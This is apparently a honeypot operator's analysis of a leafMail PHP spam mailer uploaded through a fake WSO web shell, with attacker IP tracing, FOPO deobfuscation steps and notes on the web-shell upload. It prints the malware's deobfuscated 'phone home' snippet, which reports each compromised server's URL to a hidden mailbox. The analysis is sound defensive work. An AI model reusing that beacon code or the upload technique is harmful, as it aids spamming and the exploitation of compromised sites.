Just another email spamming tool with a web page
front end. Seems to bill by the email sent, which
is weird, since leafMail is a wrapper around PHPMailer,
which itself is just a wrapper around PHP's mail() builtin.
73.192.243.136.in-addr.arpa name = monts.historicalorigins.net.
Surprise! monts.historicalorigins.net not in DNS!
Surprise! historicalorigins.net not in DNS!
Neither monts.historicalorigins.net nor historicalorigins.net in whois, either.
whois says 136.243.192.73 is a Hetzner Online IP addres, traceroute
seems to confirm that IP address physical location is in Germany.
p0f3 says that IP address is running "Windows 7 or 8".
Downloaded to a fake WSO web shell, which is part of my
WordPress honey pot. The downloader used the "FilesMan"
action, "uploadFile" subaction. The downloader tried
to create a file named seostyle.php.
The downloading program didn't actually "log in", but rather sent a HTTP cookie that WSO would recognize as meaning that the client had logged in before. Amusing, in that my HTTP server has never seen IP address 136.243.192.73 before.
IP address 136.243.192.73 did try to access a URL
containing seostyle.php within one minute of downloading
it to my honeypot. The WordPress honey pot did not capture
anything of interest from these 2 accesses.
It's FOPO encoded: Sunday, December 4th, 2016 at 12:45 UTC from IP 41.227.252.151.
The current (2018-02-05) LeafMail zip file has a FOPO obfuscation performed June 13th, 2017 at 4:39 UTC from IP 46.32.125.191. LeafMail is actively maintained.
- php ~/src/php/FOPO-PHP-Deobfuscator/ver.-0.22/deobfuscator.php *file > dc1.php
- ~/src/php/reverse-php-malware/pp.php dc1.php > f1.php
It's a modified leafMail emailer, wrapper around class PHPMailer, '5.2.14', which dates to Nov 1, 2015.
Instances of leafMail provide a nifty web page to fill in
all of the spamming parameters, and it has a login
page that appears to have been lifted from WSO web shell.
All the email parameters, to-address(es), from-address, subject, email body, etc, arrive in a set of HTTP POST parameters.
The version of LeafMail downloaded to my honey pot has a file upload function in addition to the email spamming part. Neither the download code nor an additional "phone home" chunk of code appears in the LeafMail I downloaded from leafmail.pw
The leafmail.pw web page offers 3 different web sites where you can download a Zip file. It looks relatively professional. I can't figure out how LeafMail's developer(s) make money from it.
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$bilsmg = "Link Mailer : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
$bilsnd = "[email protected]";
$bilsub = "New Mailer Uploaded By WS !! {$ip}";
$bilhead = "From: Leaf_WS";
$bilhead .= $_POST['eMailAdd'] . "\n";
$bilhead .= "MIME-Version: 1.0\n";
$arr = array($bilsnd, $IP);
foreach ($arr as $bilsnd) {
mail($bilsnd, $bilsub, $bilsmg, $bilhead, $message);
}
The FOPO obfuscator conveniently notes timestamp and IP address of the encoder. Two IP addresses appear, one in the FOPO-encoded material downloaded to my honey pot, another in the FOPO-encoded material I downloaded 2018-02-05 from leafmail.pw.
- 41.227.252.151, Hexabyte, apparently an ISP in Tunis.
- 46.32.125.191, 46.32.125.0/24AS48832, Zaid Data ISP in Amman, Jordan